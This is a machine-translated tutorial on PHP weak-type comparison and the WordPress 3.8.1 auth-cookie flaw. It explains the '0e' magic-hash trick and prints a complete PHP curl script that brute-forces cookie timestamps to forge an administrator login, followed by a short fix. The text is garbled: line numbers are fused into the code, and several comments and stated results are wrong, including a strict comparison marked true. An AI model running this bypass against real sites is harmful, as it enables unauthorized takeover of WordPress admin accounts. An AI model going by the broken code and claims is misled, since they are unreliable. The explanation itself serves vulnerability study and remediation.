PHP Weak type: WordPress cookie forgery

1 php Weak type

PHP is a weakly typed language, so variables are automatically type-converted because they use different scenarios. Use = = in PHP as well ! = when the equality is judged, the type conversion is done automatically, with the = = = and ! = = does not automatically convert the type when it is judged.

1<?PHP2     $a= 3;3     $b= ' 3vic ';4     Var_dump($a==$b);//true5     Var_dump($a!=$b);//false6     Var_dump($a===$b);//true7     Var_dump($a!==$b);//false8?>

Description: When converting a string into an integer in PHP, the number will be converted to the previous number (' 3vic ', 3), if it is not the beginning of the number, then it will be converted to 0 (' Vic '--0)

2 WordPress Code

• WordPress 3.8.1 and WordPress 3.8.2 Part of the Code differences

 1  <? php  2   WordPress 3.8.1  3  if  ( $hmac ! =  $hash  ) {}  4  //  WordPress 3.8.2  5  if  (Hash_hmac (' MD5 ',  $hmac , " Span style= "color: #800080;" > $key )!== hash_hmac (' MD5 ',  $hash ,  $key   6 ?; 

• Cookie composition

The client only validates one of the cookies in the background, as shown below

wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin| 1433403595|cf50f3b50eed94dd0fdc3d3ea2c7bbb; Path=/wp-admin; Domain=www.test.ichunqiu; HttpOnly

Where the cookie wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 name format wordpress_ is + MD5 siteurl () siteurl which is the URL of WordPress, here the website address is http://www.test.ichunqiu, MD5 is encrypted c47f4a97d0321c1980bb76fc00d1e78f , other parts can also be saved.

Type user name Expiration time login successful server side gives client hash value

corresponding variable	$username	$expiration	$hmac
Cookies	Admin	1433403595	cf50f3b50eed94dd0fdc3d3ea2c7bbb

• Analyze Authentication Login

Code wp-includes/pluggable.php第543-549 Line

1<?PHP2     $key= Wp_hash ($username.$pass _frag. ' | '.$expiration,$scheme);3     $hash= Hash_hmac (' MD5 ',$username. ' | '.$expiration,$key);4     if($hmac!=$hash ) {5Do_action (' Auth_cookie_bad_hash ',$cookie _elements);6     return false;7}

In the variables used by the code, there are $username user names that can be controlled by changing the client cookie,$expiration expiration date, and because the user name is fixed, only $expiration Is controllable, so we can change $expiration the way $hash we change it.

• Combined with PHP Hash comparison defect analysis WordPress

There are several possible $hmac == $hash reasons to be true, a string that is exactly equal to or $hmac equal to 0, and a string that begins with a $hash character; change the value of the cookie in $hmac the client to 0, and then if ( $hmac != $hash ) { The above line of writing var_dump($hmac);die(); found that $hmac the printed result string ‘0‘ is not int 0 , then there is no way to make the string recognized as an integer, the code is as follows:

1 <? PHP 2 Var_dump (' 0 ' = = ' 0e156464513131 '); // true

It will be recognized as 0 times 10 of 156,464,513,131 times, or 0, so when $hash the beginning of the 0e is full of numbers with the value of ' 0 ' when it is equal, 0e156464513131 $hmac So we can set the client's cookie to resemble wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 and then constantly update the expiration time (now 1433403595 of the location) method to collide the server $hash side, once the value of 0e after the beginning of all the numbers can be verified through. If the collision succeeds, modify the browser's cookie, direct access to the backend address, you can successfully login backstage.

3 Test Scripts

　　By changing the value of the expiration time in the client cookie, we constantly try to log in to the background to find the time stamp that can enter the background, thus realizing the cookie forgery login background.

1<?PHP2 /*3 4 This script is used for WordPress 3.8.1 cookie Forgery Vulnerability detection5 two values passed in6 WordPress's homepage $host7 Administrator user name $root8 */9     Header("Content-type:text/html;charset=utf-8");Ten  One     $host= ' http://xxx.xxx.xxx ';//Home address does not end with '/' A     $root= ' user ';//Administrator user name -  -     $url=$host.‘ /wp-admin/';//Admin Address the     $sitehash=MD5($host);  -  -     Echo"\nwelcome\n\n"; -     //spoofing cookies through timestamp brute force cookie implementation +      for($i= 1500000000;$i<1600000000;$i++){ -         $cookie= "Wordpress_".$sitehash." =".$root."|".$i."| 0; ";//combine to construct cookies +         $header=Array( A"Content-type:application/x-www-form-urlencoded", at' User-agent:mozilla/4.0 (compatible; MSIE. 0; Windows NT 6.1; trident/4.0; SLCC2;) ', -"Cookie:".$cookie, -       ); -  -         $curl= Curl_init ();//start a Curl session -curl_setopt ($curl, Curlopt_url,$url);//the address to be accessed incurl_setopt ($curl, curlopt_followlocation, 1);//Use Auto Jump -curl_setopt ($curl, Curlopt_autoreferer, 1);//set Referer automatically tocurl_setopt ($curl, Curlopt_httpget,true);//send a regular POST request +curl_setopt ($curl, Curlopt_httpheader,$header);//read the cookie information stored above -curl_setopt ($curl, Curlopt_returntransfer, 1);//gets the information returned as a file stream thecurl_setopt ($curl, Curlopt_header,false); *curl_setopt ($curl, Curlopt_header, 0);  $curl_setopt ($curl, Curlopt_http_version, CURL_HTTP_VERSION_1_0);//Let curl automatically select a versionPanax Notoginseng         $tmpInfo= Curl_exec ($curl);//Perform Actions -         if(Curl_errno ($curl)) {     the         Echo' Errno '. Curl_error ($curl);  +         }     ACurl_close ($curl);//turn off the curl session the  + //Matching results -         if(strstr($tmpInfo, ' We've got a couple of links for you to get started ')){ $             Echo"\ n". ' Success: '.$cookie." \ n "; $              Break; -}Else{ -             Echo' Fail: '.$cookie." \ n "; the         } - Wuyi     } the?>

Description　　 : Theoretically, the 32-bit MD5 value starts at approximately One-three hundred millonth of 0e, and the chance of collisions to the available $expiration is extremely low .

5 Remediation Scenarios

PHP uses the hash comparison function, which will be the = = , ! = change to = = = and ! = = or two variables to be compared using MD5 to encrypt again.

Study Note: http://ichunqiu.com/course/167

PHP Weak type: WordPress cookie forgery